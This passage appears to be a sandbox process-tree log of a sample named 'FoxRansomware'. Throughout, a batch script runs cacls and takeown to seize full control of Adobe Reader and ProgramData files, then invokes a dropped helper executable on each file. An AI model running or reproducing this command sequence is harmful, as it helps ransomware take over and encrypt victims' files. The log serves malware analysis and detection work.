  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C | PID:2004
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" | PID:2296
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "forms_distributed.gif" -nobanner | PID:3212
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "forms_distributed.gif" -nobanner | PID:2016
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:5152

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"" | PID:336
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C | PID:3064
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" | PID:2036
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "reviews_sent.gif" -nobanner | PID:1876
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "reviews_sent.gif" -nobanner | PID:292
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:916

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"" | PID:2716
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C | PID:2924
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" | PID:2204
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "stop_collection_data.gif" -nobanner | PID:796
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "stop_collection_data.gif" -nobanner | PID:976
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:2896

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"" | PID:1892
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C | PID:2376
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" | PID:1096
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ReadMe.htm" -nobanner | PID:2784
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "ReadMe.htm" -nobanner | PID:2940
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:1400

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"" | PID:2100
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C | PID:2484
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" | PID:2440
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MinionPro-It.otf" -nobanner | PID:2444
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "MinionPro-It.otf" -nobanner | PID:1456
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:3020

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"" | PID:3988
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C | PID:936
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" | PID:2168
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ZX______.PFB" -nobanner | PID:2588
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "ZX______.PFB" -nobanner | PID:1308
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:2388

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"" | PID:3392
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C | PID:3364
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" | PID:3256
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "brt04.hsp" -nobanner | PID:3200
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "brt04.hsp" -nobanner | PID:1672
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:3028

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"" | PID:3264
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C | PID:4012
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" | PID:4308
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "engphon.env" -nobanner | PID:2916
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "engphon.env" -nobanner | PID:3512
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:1904

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"" | PID:4356
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C | PID:2744
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" | PID:3128
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CORPCHAR.TXT" -nobanner | PID:3096
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "CORPCHAR.TXT" -nobanner | PID:3448
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:2396

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"" | PID:960
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C | PID:3104
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" | PID:2752
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CP1250.TXT" -nobanner | PID:3004
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "CP1250.TXT" -nobanner | PID:3144
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:5672

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"" | PID:1984
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C | PID:656
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" | PID:3152
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "AGMGPUOptIn.ini" -nobanner | PID:2640
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "AGMGPUOptIn.ini" -nobanner | PID:2160
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:4564

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"" | PID:3388
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C | PID:4044
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" | PID:3660
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MyriadCAD.otf" -nobanner | PID:1956
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "MyriadCAD.otf" -nobanner | PID:4424
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:3508

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"" | PID:4040
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C | PID:4696
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" | PID:4020
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "create_form.gif" -nobanner | PID:4624
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "create_form.gif" -nobanner | PID:4720
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:5548

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"" | PID:4580
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C | PID:3352
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" | Modifies file permissions | PID:4504
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "info.gif" -nobanner | PID:4448
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "info.gif" -nobanner | PID:5776
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:5600

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"" | PID:5740
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C | PID:4556
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" | PID:5552
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "review_same_reviewers.gif" -nobanner | PID:2584
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "review_same_reviewers.gif" -nobanner | PID:3752
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:5624

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"" | PID:3100
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C | PID:2532
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" | PID:5620
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "trash.gif" -nobanner | PID:208
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "trash.gif" -nobanner | PID:4440
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:3804

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"" | PID:3244
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C | PID:3892
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" | PID:3852
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CourierStd-Bold.otf" -nobanner | PID:4516
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "CourierStd-Bold.otf" -nobanner | PID:3796
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:4160

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"" | PID:3248
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C | PID:5232
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" | PID:3812
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MyriadPro-It.otf" -nobanner | PID:2708
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "MyriadPro-It.otf" -nobanner | PID:2092
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:4104

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"" | PID:3832
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C | PID:5792
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" | PID:5720
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner | PID:5668
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner | PID:3800
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:5856

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"" | PID:5848
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C | PID:4100
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" | Modifies file permissions | PID:5816
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "can.hyp" -nobanner | PID:5724
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "can.hyp" -nobanner | PID:5696
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:3308

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"" | PID:4224
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C | PID:5956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"3⤵
- Modifies file permissions
PID:5988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "usa37.hyp" -nobanner3⤵PID:4196
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "usa37.hyp" -nobanner4⤵PID:5636
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4188
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""2⤵PID:4260
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C3⤵PID:4220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵PID:4272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ICELAND.TXT" -nobanner3⤵PID:4256
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "ICELAND.TXT" -nobanner4⤵PID:2796
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1272
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵PID:5316
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C3⤵PID:4180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"3⤵PID:1896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CP1254.TXT" -nobanner3⤵PID:4228
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "CP1254.TXT" -nobanner4⤵PID:5256
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5192
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""2⤵PID:2448
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C3⤵PID:5896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"3⤵PID:604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "LogTransport2.exe" -nobanner3⤵PID:4620
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "LogTransport2.exe" -nobanner4⤵PID:5916
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:4788
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵PID:4796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "overlay.png" -nobanner3⤵PID:5920
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "overlay.png" -nobanner4⤵PID:4316
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""2⤵PID:4892
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C3⤵PID:4880
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"3⤵
- Modifies file permissions
PID:4932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "bl.gif" -nobanner3⤵PID:4776
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "bl.gif" -nobanner4⤵PID:2936
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""2⤵PID:4820
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C3⤵PID:5036
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"3⤵PID:4840
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "forms_super.gif" -nobanner3⤵PID:5948
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "forms_super.gif" -nobanner4⤵PID:2132
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""2⤵PID:4800
-
